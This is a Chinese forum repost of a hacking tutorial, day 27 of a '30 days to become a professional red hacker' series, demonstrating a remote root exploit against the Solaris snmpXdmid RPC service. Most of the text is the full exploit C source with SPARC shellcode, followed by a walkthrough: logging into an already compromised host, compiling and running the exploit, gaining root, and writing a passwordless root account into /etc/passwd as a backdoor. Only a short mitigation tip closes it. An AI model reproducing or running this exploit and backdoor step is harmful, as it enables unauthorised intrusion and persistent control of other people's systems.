- 论坛徽章:
- 0
|
30天打造专业红客
30天打造专业红客『第27天』Sunos(二) \r\n\r\n[ 作者:蓝色 转贴自:基尔网 ]\r\n\r\n接着昨天的,今天,我们来看看Sunos的远程溢出。\r\n\r\n \r\n\r\n本次范例需要的系统及程序情况如下:\r\n\r\n操作系统:Window2000 To Sunos 5.8\r\n\r\n对方操作系统:Sunos 5.8\r\n\r\n程序(一):snmpxdmid.c \r\n\r\n本机IP:127.0.0.1\r\n\r\n测试IP:127.0.0.29\r\n\r\n新程序说明:“snmpxdmid.c”是利用Rpc的snmpxdmid服务写的exploit。\r\n\r\nSolaris snmpXdmid 远程缓冲区溢出漏洞:\r\n\r\nSolaris 2.6/7/8三个版本都携带了一个名为snmpXdmid的RPC服务,这个服务主要用\r\n于在SNMP管理请求和DMI请求之间建立一种映射/转换关系。\r\n\r\n在 UXIX 中,Desktop Management Interface (DMI) 和 SNMP 是两个协调工作的远程管理协议。Sun Microsystems 创建了SNMPxDMID(/usr/lib/dmi/snmpXdmid)映射守护进程来连接这两个协议。此守护进程传输 SNMP 请求给 DMI,但是发现它在处理‘INDICATION’时存在缓冲区溢出问题。本地和远程攻击者利用此漏洞能获得超级用户特权。\r\n\r\n\r\n测试开始:\r\n\r\ntelnet ***.xxx.xxx.xxx\r\n\r\n* telnet上我的肉鸡。\r\n\r\nSunOS 5.8 \r\n\r\nlogin: cnhack\r\nPassword:\r\nLast login: Sun Jul 29 19:37:19 from 127.0.0.1\r\nSun Microsystems Inc. SunOS 5.8 Generic February 2000\r\n$ \r\n\r\n$./usr/man/man5/shell\r\n\r\n#\r\n\r\n* 取得root权限。\r\n\r\n# cat >; snmpxdmid.c\r\n\r\n* 把exploit贴到主机上。\r\n\r\n/*## copyright LAST STAGE OF DELIRIUM mar 2001 poland *://lsd-pl.net/ #*/\r\n/*## snmpXdmid #*/\r\n\r\n/* as the final jump to the assembly code is made to the heap area, this code */\r\n/* also works against machines with non-exec stack protection turned on */\r\n/* due to large data transfers of about 128KB, the code may need some time to */\r\n/* proceed, so be patient */\r\n\r\n#include <sys/types.h>;\r\n#include <sys/socket.h>;\r\n#include <sys/time.h>;\r\n#include <netinet/in.h>;\r\n#include <rpc/rpc.h>;\r\n#include <netdb.h>;\r\n#include <unistd.h>;\r\n#include <stdio.h>;\r\n#include <errno.h>;\r\n\r\n#define SNMPXDMID_PROG 100249\r\n#define SNMPXDMID_VERS 0x1\r\n#define SNMPXDMID_ADDCOMPONENT 0x101\r\n\r\nchar findsckcode[]=\r\n\"\\x20\\xbf\\xff\\xff\" /* bn,a <findsckcode-4>; */\r\n\"\\x20\\xbf\\xff\\xff\" /* bn,a <findsckcode>; */\r\n\"\\x7f\\xff\\xff\\xff\" /* call <findsckcode+4>; */\r\n\"\\x33\\x02\\x12\\x34\"\r\n\"\\xa0\\x10\\x20\\xff\" /* mov 0xff,%l0 */\r\n\"\\xa2\\x10\\x20\\x54\" /* mov 0x54,%l1 */\r\n\"\\xa4\\x03\\xff\\xd0\" /* add %o7,-48,%l2 */\r\n\"\\xaa\\x03\\xe0\\x28\" /* add %o7,40,%l5 */\r\n\"\\x81\\xc5\\x60\\x08\" /* jmp %l5+8 */\r\n\"\\xc0\\x2b\\xe0\\x04\" /* stb %g0,[%o7+4] */\r\n\"\\xe6\\x03\\xff\\xd0\" /* ld [%o7-48],%l3 */\r\n\"\\xe8\\x03\\xe0\\x04\" /* ld [%o7+4],%l4 */\r\n\"\\xa8\\xa4\\xc0\\x14\" /* subcc %l3,%l4,%l4 */\r\n\"\\x02\\xbf\\xff\\xfb\" /* bz <findsckcode+32>; */\r\n\"\\xaa\\x03\\xe0\\x5c\" /* add %o7,92,%l5 */\r\n\"\\xe2\\x23\\xff\\xc4\" /* st %l1,[%o7-60] */\r\n\"\\xe2\\x23\\xff\\xc8\" /* st %l1,[%o7-56] */\r\n\"\\xe4\\x23\\xff\\xcc\" /* st %l2,[%o7-52] */\r\n\"\\x90\\x04\\x20\\x01\" /* add %l0,1,%o0 */\r\n\"\\xa7\\x2c\\x60\\x08\" /* sll %l1,8,%l3 */\r\n\"\\x92\\x14\\xe0\\x91\" /* or %l3,0x91,%o1 */\r\n\"\\x94\\x03\\xff\\xc4\" /* add %o7,-60,%o2 */\r\n\"\\x82\\x10\\x20\\x36\" /* mov 0x36,%g1 */\r\n\"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n\"\\x1a\\xbf\\xff\\xf1\" /* bcc <findsckcode+36>; */\r\n\"\\xa0\\xa4\\x20\\x01\" /* deccc %l0 */\r\n\"\\x12\\xbf\\xff\\xf5\" /* bne <findsckcode+60>; */\r\n\"\\xa6\\x10\\x20\\x03\" /* mov 0x03,%l3 */\r\n\"\\x90\\x04\\x20\\x02\" /* add %l0,2,%o0 */\r\n\"\\x92\\x10\\x20\\x09\" /* mov 0x09,%o1 */\r\n\"\\x94\\x04\\xff\\xff\" /* add %l3,-1,%o2 */\r\n\"\\x82\\x10\\x20\\x3e\" /* mov 0x3e,%g1 */\r\n\"\\xa6\\x84\\xff\\xff\" /* addcc %l3,-1,%l3 */\r\n\"\\x12\\xbf\\xff\\xfb\" /* bne <findsckcode+112>; */\r\n\"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n;\r\n\r\nchar shellcode[]=\r\n\"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode-4>; */\r\n\"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode>; */\r\n\"\\x7f\\xff\\xff\\xff\" /* call <shellcode+4>; */\r\n\"\\x90\\x03\\xe0\\x20\" /* add %o7,32,%o0 */\r\n\"\\x92\\x02\\x20\\x10\" /* add %o0,16,%o1 */\r\n\"\\xc0\\x22\\x20\\x08\" /* st %g0,[%o0+8] */\r\n\"\\xd0\\x22\\x20\\x10\" /* st %o0,[%o0+16] */\r\n\"\\xc0\\x22\\x20\\x14\" /* st %g0,[%o0+20] */\r\n\"\\x82\\x10\\x20\\x0b\" /* mov 0x0b,%g1 */\r\n\"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n\"/bin/ksh\"\r\n;\r\n\r\nstatic char nop[]=\"\\x80\\x1c\\x40\\x11\";\r\n\r\ntypedef struct{\r\nstruct{unsigned int len;char *val;}name;\r\nstruct{unsigned int len;char *val;}pragma;\r\n}req_t;\r\n\r\nbool_t xdr_req(XDR *xdrs,req_t *objp){\r\nchar *v=NULL;unsigned long l=0;int b=1;\r\nif(!xdr_u_long(xdrs,&l)) return(FALSE);\r\nif(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);\r\nif(!xdr_bool(xdrs,&b)) return(FALSE);\r\nif(!xdr_u_long(xdrs,&l)) return(FALSE);\r\nif(!xdr_bool(xdrs,&b)) return(FALSE);\r\nif(!xdr_array(xdrs,&objp->;name.val,&objp->;name.len,~0,sizeof(char),\r\n(xdrproc_t)xdr_char)) return(FALSE);\r\nif(!xdr_bool(xdrs,&b)) return(FALSE);\r\nif(!xdr_array(xdrs,&objp->;pragma.val,&objp->;pragma.len,~0,sizeof(char),\r\n(xdrproc_t)xdr_char)) return(FALSE);\r\nif(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);\r\nif(!xdr_u_long(xdrs,&l)) return(FALSE);\r\nreturn(TRUE);\r\n}\r\n\r\nmain(int argc,char **argv){\r\nchar buffer[140000],address[4],pch[4],*b;\r\nint i,c,n,vers=-1,port=0,sck;\r\nCLIENT *cl;enum clnt_stat stat;\r\nstruct hostent *hp;\r\nstruct sockaddr_in adr;\r\nstruct timeval tm={10,0};\r\nreq_t req;\r\n\r\nprintf(\"copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/\\n\"\r\nprintf(\"snmpXdmid for solaris 2.7 2.8 sparc\\n\\n\"\r\n\r\nif(argc<2){\r\nprintf(\"usage: %s address [-p port] -v 7|8\\n\",argv[0]);\r\nexit(-1);\r\n}\r\n\r\nwhile((c=getopt(argc-1,&argv[1],\"p:v:\")!=-1){\r\nswitch(c){\r\ncase \'p\': port=atoi(optarg);break;\r\ncase \'v\': vers=atoi(optarg);\r\n}\r\n}\r\nswitch(vers){\r\ncase 7: *(unsigned int*)address=0x000b1868;break;\r\ncase 8: *(unsigned int*)address=0x000cf2c0;break;\r\ndefault: exit(-1);\r\n}\r\n\r\n*(unsigned long*)pch=htonl(*(unsigned int*)address+32000);\r\n*(unsigned long*)address=htonl(*(unsigned int*)address+64000+32000);\r\n\r\nprintf(\"adr=0x%08x timeout=%d \",ntohl(*(unsigned long*)address),tm.tv_sec);\r\nfflush(stdout);\r\n\r\nadr.sin_family=AF_INET;\r\nadr.sin_port=htons(port);\r\nif((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){\r\nif((hp=gethostbyname(argv[1]))==NULL){\r\nerrno=EADDRNOTAVAIL;perror(\"error\"exit(-1);\r\n}\r\nmemcpy(&adr.sin_addr.s_addr,hp->;h_addr,4);\r\n}\r\n\r\nsck=RPC_ANYSOCK;\r\nif(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){\r\nclnt_pcreateerror(\"error\"exit(-1);\r\n}\r\ncl->;cl_auth=authunix_create(\"localhost\",0,0,0,NULL);\r\n\r\ni=sizeof(struct sockaddr_in);\r\nif(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){\r\nstruct{unsigned int maxlen;unsigned int len;char *buf;}nb;\r\nioctl(sck,((\'S\'<<|2),\"sockmod\"\r\nnb.maxlen=0xffff;\r\nnb.len=sizeof(struct sockaddr_in);;\r\nnb.buf=(char*)&\r\nioctl(sck,((\'T\'<<|144),&nb);\r\n}\r\nn=ntohs(adr.sin_port);\r\nprintf(\"port=%d connected! \",n);fflush(stdout);\r\n\r\nfindsckcode[12+2]=(unsigned char)((n&0xff00)>;>;;\r\nfindsckcode[12+3]=(unsigned char)(n&0xff);\r\n\r\nb=&buffer[0];\r\nfor(i=0;i<1248;i++) *b++=pch[i%4];\r\nfor(i=0;i<352;i++) *b++=address[i%4];\r\n*b=0;\r\n\r\nb=&buffer[10000];\r\nfor(i=0;i<64000;i++) *b++=0;\r\nfor(i=0;i<64000-188;i++) *b++=nop[i%4];\r\nfor(i=0;i<strlen(findsckcode);i++) *b++=findsckcode;\r\nfor(i=0;i<strlen(shellcode);i++) *b++=shellcode;\r\n*b=0;\r\n\r\nreq.name.len=1200+400+4;\r\nreq.name.val=&buffer[0];\r\nreq.pragma.len=128000+4;\r\nreq.pragma.val=&buffer[10000];\r\n\r\nstat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm);\r\nif(stat==RPC_SUCCESS) {printf(\"\\nerror: not vulnerable\\n\"exit(-1);}\r\nprintf(\"sent!\\n\"\r\n\r\nwrite(sck,\"/bin/uname -a\\n\",14);\r\nwhile(1){\r\nfd_set fds;\r\nFD_ZERO(&fds);\r\nFD_SET(0,&fds);\r\nFD_SET(sck,&fds);\r\nif(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){\r\nint cnt;\r\nchar buf[1024];\r\nif(FD_ISSET(0,&fds)){\r\nif((cnt=read(0,buf,1024))<1){\r\nif(errno==EWOULDBLOCK||errno==EAGAIN) continue;\r\nelse break;\r\n}\r\nwrite(sck,buf,cnt);\r\n}\r\nif(FD_ISSET(sck,&fds)){\r\nif((cnt=read(sck,buf,1024))<1){\r\nif(errno==EWOULDBLOCK||errno==EAGAIN) continue;\r\nelse break;\r\n}\r\nwrite(1,buf,cnt);\r\n}\r\n}\r\n}\r\n}\r\n\r\n\r\n\r\n^D\r\n\r\n \r\n\r\n# gcc -o snmpxdmid snmpxdmid.c -lnsl –lsocket\r\n\r\n* 编译exploit。\r\n\r\nsnmp.c: In function `main\':\r\n\r\nsnmp.c:135: warning: assignment makes pointer from integer without a cast\r\n\r\nsnmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type\r\n\r\n# ./snmpxdmid\r\n\r\n* 运行exploit。\r\n\r\ncopyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/\r\n\r\nsnmpXdmid for solaris 2.7 2.8 sparc\r\n\r\nusage: ./snmpxdmid address [-p port] -v 7|8\r\n\r\n#./snmpxdmid 127.0.0.29 –v 8 \r\n\r\n* 溢出。\r\n\r\n* 说明:\r\n\r\n* address:主机IP地址。\r\n\r\n* [-p port]:溢出端口。\r\n\r\n* -v 7|8:solaris 2.7 (Sunos 5.7)或者solaris 2.8(Sunos 5.8)\r\n\r\ncopyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/\r\n\r\nsnmpXdmid for solaris 2.7 2.8 sparc\r\n\r\nadr=0x000c8f68 timeout=30 port=928 connected!\r\n\r\nsent!\r\n\r\nSunOS business 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250\r\n\r\n* 溢出成功。\r\n\r\nid\r\n\r\nuid=0(root) gid=0(root)\r\n\r\n* 取得root权限。\r\n\r\necho \"cnhack::1:0::/:/bin/bash\" >; /etc/passwd\r\n\r\n* 添加一个用户名为cnhack,密码为空的管理员。\r\n\r\ntelnet localhost \r\n\r\n* telnet主机:127.0.0.29\r\n\r\nTrying 127.0.0.1...\r\n\r\nConnected to localhost. Escape character is \'^]\'.\r\n\r\nSunOS 5.8 \r\n\r\nlogin: cnhack\r\nPassword:\r\nLast login: Sun Jul 29 19:37:19 from 127.0.0.1\r\nSun Microsystems Inc. SunOS 5.8 Generic February 2000\r\n$ \r\n\r\n……\r\n\r\n解决方法: \r\n1) 将 /etc/rc .d/S dmi 重命为 /etc/rc .d/K07dmi (此处 代表对应运行级);再执行命令:/etc/init.d/init.dmi stop \r\n2) 保险起见,可改变其用户权限: chmod 000 /usr/lib/dmi/snmpXdmid \r\n\r\n\r\n\r\n\r\n好了,快通知管理员打上补丁吧^_^\r\n\r\n\r\n注意 :以上文章是小铭的一篇文章中的资料\r\n\r\n在此特别谢谢小铭给我们写了这么好的文章 |
|